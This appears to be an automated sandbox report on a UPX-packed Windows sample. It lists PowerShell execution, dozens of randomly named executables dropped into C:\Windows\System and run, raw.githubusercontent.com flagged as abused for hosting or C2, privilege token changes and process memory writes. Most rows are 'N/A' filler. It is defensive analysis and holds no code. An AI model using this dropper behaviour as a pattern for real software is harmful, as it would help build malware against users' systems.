N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\FfVndNF.exe N/A
N/A N/A C:\Windows\System\llSHySI.exe N/A
N/A N/A C:\Windows\System\wVXsIox.exe N/A
N/A N/A C:\Windows\System\CYaIgYH.exe N/A
N/A N/A C:\Windows\System\nVbdTzY.exe N/A
N/A N/A C:\Windows\System\tMgOoUw.exe N/A
N/A N/A C:\Windows\System\dAQyTqN.exe N/A
N/A N/A C:\Windows\System\dYzsBxK.exe N/A
N/A N/A C:\Windows\System\DAFYvPk.exe N/A
N/A N/A C:\Windows\System\FfKsjAm.exe N/A
N/A N/A C:\Windows\System\jtCxZJv.exe N/A
N/A N/A C:\Windows\System\tJOEUEw.exe N/A
N/A N/A C:\Windows\System\TpkqoNA.exe N/A
N/A N/A C:\Windows\System\vDLlHmF.exe N/A
N/A N/A C:\Windows\System\IwRawcL.exe N/A
N/A N/A C:\Windows\System\CjQgaty.exe N/A
N/A N/A C:\Windows\System\odTtZfG.exe N/A
N/A N/A C:\Windows\System\LYiABLS.exe N/A
N/A N/A C:\Windows\System\MowaUVv.exe N/A
N/A N/A C:\Windows\System\VqFbeRe.exe N/A
N/A N/A C:\Windows\System\ABLgFgU.exe N/A
N/A N/A C:\Windows\System\kQKSDoh.exe N/A
N/A N/A C:\Windows\System\MvLfXbp.exe N/A
N/A N/A C:\Windows\System\vxHpUDx.exe N/A
N/A N/A C:\Windows\System\UPqFffY.exe N/A
N/A N/A C:\Windows\System\jsUsKBi.exe N/A
N/A N/A C:\Windows\System\mUwtJJg.exe N/A
N/A N/A C:\Windows\System\jkhrtYs.exe N/A
N/A N/A C:\Windows\System\FqgWpFu.exe N/A
N/A N/A C:\Windows\System\AlpnrbW.exe N/A
N/A N/A C:\Windows\System\EUTgGGF.exe N/A
N/A N/A C:\Windows\System\OcaOFDU.exe N/A
N/A N/A C:\Windows\System\EAdZMyE.exe N/A
N/A N/A C:\Windows\System\cPOEsuV.exe N/A
N/A N/A C:\Windows\System\vXLzwzF.exe N/A
N/A N/A C:\Windows\System\dZGEQAE.exe N/A
N/A N/A C:\Windows\System\IVCRiIc.exe N/A
N/A N/A C:\Windows\System\jlBVpnZ.exe N/A
N/A N/A C:\Windows\System\FyQuPiQ.exe N/A
N/A N/A C:\Windows\System\ZASCigA.exe N/A
N/A N/A C:\Windows\System\UxKEWZL.exe N/A
N/A N/A C:\Windows\System\QCeCoJv.exe N/A
N/A N/A C:\Windows\System\EDmVOab.exe N/A
N/A N/A C:\Windows\System\ApjYVYN.exe N/A
N/A N/A C:\Windows\System\ZjHKYod.exe N/A
N/A N/A C:\Windows\System\RdzDpmX.exe N/A
N/A N/A C:\Windows\System\CNRcKwk.exe N/A
N/A N/A C:\Windows\System\zoIQNEl.exe N/A
N/A N/A C:\Windows\System\LlIUSxq.exe N/A
N/A N/A C:\Windows\System\wqbfAyo.exe N/A
N/A N/A C:\Windows\System\KthHqDt.exe N/A
N/A N/A C:\Windows\System\dkTaZiN.exe N/A
N/A N/A C:\Windows\System\VlMBuLn.exe N/A
N/A N/A C:\Windows\System\LxzUaMH.exe N/A
N/A N/A C:\Windows\System\glTqwZY.exe N/A
N/A N/A C:\Windows\System\JWnFRMg.exe N/A
N/A N/A C:\Windows\System\uWAtFtU.exe N/A
N/A N/A C:\Windows\System\hfmKEWY.exe N/A
N/A N/A C:\Windows\System\CGFRojJ.exe N/A
N/A N/A C:\Windows\System\DfHkAPi.exe N/A
N/A N/A C:\Windows\System\XdLDBmI.exe N/A
N/A N/A C:\Windows\System\BSQHlQE.exe N/A
N/A N/A C:\Windows\System\VRkTqzr.exe N/A
N/A N/A C:\Windows\System\EqwEVjB.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\xMroACK.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\odTtZfG.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IgjmrvK.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\IVFNcgj.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\bSpDBUE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\byocDcY.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\sopJDOy.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\jZvcaRR.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\feylvnr.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\PWnHJjp.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\vVezwdf.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\TNtNrFh.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\KoaGNmW.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\oLkZVXi.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\reOLmes.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\dPqhNQh.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\qnGiaAk.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\HHqwOan.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\sswAjtA.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\jsUsKBi.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\OmvCxTP.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\nCPdwYM.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\jUakCeT.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\bZzroct.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ibWJfVI.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\XIDJskp.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ALUEQUX.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\cTmgYZs.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\eSENxhh.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\cEffzWH.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\uqjPXpv.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\QBUGKyf.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\amrmdSL.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\CYJyfNL.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\zDKSmOQ.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\KFdbVqu.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\nWfJfjG.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\mOilbGe.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\cDqZDFB.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\XgSsTmy.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ZoaItha.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ijVgmdj.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\sCpRViM.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\EAdZMyE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\lRmqrav.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\CDMnvbA.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ncYQyEe.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\KxVjfWu.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\uyEWbqG.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\jJBKNUw.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\nhOePKn.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\qRSotvM.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\ZUzwWGH.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\hXERzty.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\MhFLElT.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\rBIXUbr.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\BMNPHDQ.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\TTziVln.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\JdnkcSV.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\GmUvKvp.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\hlJIoVj.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\VgQoXfM.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\GsdojuE.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
File created C:\Windows\System\kqTNaoc.exe C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3160 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfVndNF.exe
PID 3160 wrote to memory of 4628 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfVndNF.exe
PID 3160 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\llSHySI.exe
PID 3160 wrote to memory of 5112 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\llSHySI.exe
PID 3160 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\wVXsIox.exe
PID 3160 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\wVXsIox.exe
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CYaIgYH.exe
PID 3160 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CYaIgYH.exe
PID 3160 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\nVbdTzY.exe
PID 3160 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\nVbdTzY.exe
PID 3160 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tMgOoUw.exe
PID 3160 wrote to memory of 3596 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tMgOoUw.exe
PID 3160 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dAQyTqN.exe
PID 3160 wrote to memory of 4452 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dAQyTqN.exe
PID 3160 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dYzsBxK.exe
PID 3160 wrote to memory of 1516 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\dYzsBxK.exe
PID 3160 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\DAFYvPk.exe
PID 3160 wrote to memory of 2972 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\DAFYvPk.exe
PID 3160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfKsjAm.exe
PID 3160 wrote to memory of 464 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\FfKsjAm.exe
PID 3160 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\jtCxZJv.exe
PID 3160 wrote to memory of 5080 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\jtCxZJv.exe
PID 3160 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tJOEUEw.exe
PID 3160 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\tJOEUEw.exe
PID 3160 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\TpkqoNA.exe
PID 3160 wrote to memory of 3892 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\TpkqoNA.exe
PID 3160 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vDLlHmF.exe
PID 3160 wrote to memory of 4492 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vDLlHmF.exe
PID 3160 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\IwRawcL.exe
PID 3160 wrote to memory of 4716 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\IwRawcL.exe
PID 3160 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CjQgaty.exe
PID 3160 wrote to memory of 428 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\CjQgaty.exe
PID 3160 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\odTtZfG.exe
PID 3160 wrote to memory of 1276 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\odTtZfG.exe
PID 3160 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\LYiABLS.exe
PID 3160 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\LYiABLS.exe
PID 3160 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MowaUVv.exe
PID 3160 wrote to memory of 412 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MowaUVv.exe
PID 3160 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\VqFbeRe.exe
PID 3160 wrote to memory of 4984 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\VqFbeRe.exe
PID 3160 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\ABLgFgU.exe
PID 3160 wrote to memory of 560 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\ABLgFgU.exe
PID 3160 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\kQKSDoh.exe
PID 3160 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\kQKSDoh.exe
PID 3160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MvLfXbp.exe
PID 3160 wrote to memory of 3056 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\MvLfXbp.exe
PID 3160 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vxHpUDx.exe
PID 3160 wrote to memory of 516 N/A C:\Users\Admin\AppData\Local\Temp\6722f8e23f80cc39b9ef47241f8cea6c98f35648f8f05c3a5826fd78f96611a3.exe C:\Windows\System\vxHpUDx.exe
